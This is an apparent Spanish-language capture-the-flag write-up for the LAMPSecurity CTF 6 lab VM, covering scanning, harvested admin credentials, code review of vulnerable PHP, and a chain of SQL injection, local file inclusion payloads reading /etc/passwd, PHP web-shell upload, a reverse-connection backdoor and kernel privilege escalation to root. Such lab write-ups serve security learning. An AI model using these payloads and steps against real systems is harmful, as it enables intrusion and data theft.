Solucionario del LAMPSecurity: CTF 6 Challenge por @killr00t ganador del reto
14
-
Upload
el-hacklab -
Category
Documents
-
view
218 -
download
2
description
Solucionario del LAMPSecurity: CTF 6 Challenge por @killr00t ganador del reto
Transcript of Solucionario del LAMPSecurity: CTF 6 Challenge por @killr00t ganador del reto
SOLUCIONARIO CTF6LAMPSecurity
Network Mapping
Ip Target :192.168.1.72
Port Scanning y Banderas
Tool : WhatWebResultado :http://192.168.1.72 [200]Meta-Author[Justin C. Klein Keane], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], Apache[2.2.3]IP[192.168.1.72]PHP[5.2.6]X-Powered-By[PHP/5.2.6]Cookies[PHPSESSID]Title[CTF 6 - Widgets Inc.] [email protected]@[email protected]@[email protected]@[email protected][RESERVED][ZZ]
Tool : niktoResultado :---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)+ Number of sections in the version string differ from those in the database, the server reports: apache/2.2.3 while the database has: 2.2.14. This may cause false positives.+ Retrieved X-Powered-By header: PHP/5.2.6+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.+ OSVDB-3092: /files/: This might be interesting...+ OSVDB-3092: /lib/: This might be interesting...+ OSVDB-3092: /mail/: This might be interesting...+ OSVDB-3092: /phpmyadmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.+ OSVDB-3268: /sql/: Directory indexing is enabled: /sql/+ OSVDB-3092: /manual/: Web server manual found.+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons+ OSVDB-3268: /manual/images/: Directory indexing is enabled: /manual/images+ OSVDB-3268: /docs/: Directory indexing is enabled: /docs+ OSVDB-3233: /icons/README: Apache default file found.
• 3818 items checked: 16 item(s) reported on remote host
•
Directorios
Tool : DirbusterResultado :
• /cgi-bin• /files• /templates• /icons• /docs• /icons• /mail• /js• /templates
Tool : niktoResultado :
• /files• /lib• /mail• /phpmyadmin• /sql• /manual• /docs• /icons
Archivos De Interes
• /sql/db.sqlINSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');
User => adminPass => 25e4ee4e9229397b6b17776bfceaf8e7 => adminpassBDD => cmsTabla => user
• /docs/code_backup.tgz
• /conf/config.ini
• /logs/log.log
2009-06-28 13:06:09 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from%20dual2009-06-28 13:06:09 Problem with event select: . The used SELECT statements have a different number of columns2009-06-28 13:06:28 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1,1%20from%20dual2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 12009-06-28 13:06:43 172.16.61.132 called id=4%20UNION%20select%20version,1,1,1,1,1,1%20from%20dual2009-06-28 13:06:43 Problem with event select: . Unknown column 'version' in 'field list'2009-06-28 13:06:52 172.16.61.132 called id=4%20UNION%20select%20version(),1,1,1,1,1,1%20from%20dual2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 12009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 12009-06-28 13:06:13 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,7%20from%20dual2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 12009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 12009-06-28 13:06:30 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,version()%20from%20dual2009-06-28 13:06:30 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,version() from dual' at line 1
Nota: en este backup ya se habia identificado algunas vulnerabilidades, no sobra mirar las peticiones realizadas y asi escalar mas rapido
Identificacion de Vulnerabilidades (code_backup.tgz)
File : /actions/login.phpCode :-----------------------------------------------------------------------------------------------------------------------------------------------if (isset($_POST['username']) && isset($_POST['password'])) {
$sql = "select user_id from user where user_username = '" . $_POST['username'] . "'";
$query = mysql_query($sql) or die("Query error with $sql: " . mysql_error());if ($query && mysql_num_rows($query) > 0) {
//user exists$uname = mysql_fetch_object($query);$sql = "select * from user where user_id = " . $uname->user_id .
" AND user_password = md5('" . $_POST['password'] . "')";$query = mysql_query($sql)
or $log->append("Query error in login $sql<hr/> " . mysql_error());$retval = array();if (! $query) {
//no return value}else {
$retval = mysql_fetch_object($query);}
}
if (isset($retval->user_id)) {setcookie("logged_in", 1, time()+3600);setcookie("user_id", $retval->user_id, time()+3600);setcookie("hash", $retval->user_password, time()+3600);$logged_in = 1;
}}
if ($logged_in) include_once('templates/logged_in.tpl');
else include_once('templates/'.$_GET['action'].'.tpl');
Vulnerabilidades : SQL InjectionVariables Vulnerables : username, passwordDescripcion Vuln :Variables no filtradas, permitiendo interactuar con la base de datos y extraer información se valida los parametros enviados directamente, inicialmente la variable username y si existe se valida la segunda variable password , ambas son vulnerables
Vulnerabilidades : Local File IncludeVariables Vulnerables : actionDescripcion Vuln : Permite incluir por GET ficheros fuera del directorio WebExploit : /actions/login.php?action=../../../../../etc/passwd%00
File : /actions/add_event.phpCode :
if (! $logged_in) header("Location:index.php");
$log->append("Adding file!") or die("Couldn't append to log for some reason!");
if (isset($_POST['title'])) {if (isset($_FILES['upload'])) {
$uploaddir = 'files/';$uploadfile = $uploaddir . basename($_FILES['upload']['name']);if (! move_uploaded_file($_FILES['upload']['tmp_name'], $uploadfile)) {
$log->append("Log upload problem with file array: $_FILES");$log->append("Upload file name: $uploadfile");$log->append("Upload file tmp name: " . $_FILES['upload']['tmp_name']);
}}
$sql = "insert into event set event_title='" . $_POST['title'] . "',
event_body='" . addslashes($_POST['body']) . "',event_file='" . $uploadfile . "',user_id = " . $_COOKIE['user_id'];
mysql_query($sql) or $log->append("Problem with insert. " . mysql_error());}include_once('templates/'.$_GET['action'].'.tpl');
Vulnerabilidades : Local File IncludeVariables Vulnerables : actionDescripcion Vuln : Permite incluir por GET ficheros fuera del directorio WebExploit : /actions/add_event.php?action=../../../../../etc/passwd%00
Vulnerabilidades : Upload de archivosDescripcion Vuln : Permite subir archivos que me permiten ejecutar comandos de sistema operativo, esto
se debe al no validar en el codigo ninguna extencion de archivo.
Nota: Todos los archivos tienen problemas de programació, solo usare este ultimo archivo para subir la shell directamente y escalar privilegios.
Explotacion y Escalada de Privilegios
File : /actions/add_event.phpExploit : upload de archivosDescripcion : se escoge una shell php y se agrega el evento desde el logeo del CMS
• LOGIN EN EL CMS
User: adminPass: adminpass
Nota :Estos datos ya fueron recogidos desde el archivo sql encontrado.
• AGREGAR EVENTOS:En esta parte hay un menu en el cual ya vimos el codigo vulnerable que nos permite subir la shell directamente
• UPLOAD DE SHELL
Se llena el formulario y escojo mi shell (sh.php) y click en Add event
Se sube el backdoor de conexión inversa para estar mas comodo al ejecutar comandos
Nos da una serie de exploits locales que podemos utilizar, utilizare : http://www.exploit-db.com/exploits/8478/es el unico que me funciono, pero hay varios para esa version del kernel pero como digo solo me funciono este.
Nos agregamos al sistema con privilegios y entramos por el ssh
Asignamos contraseña al usuario y conectamos por el ssh
Root Owned! salud2
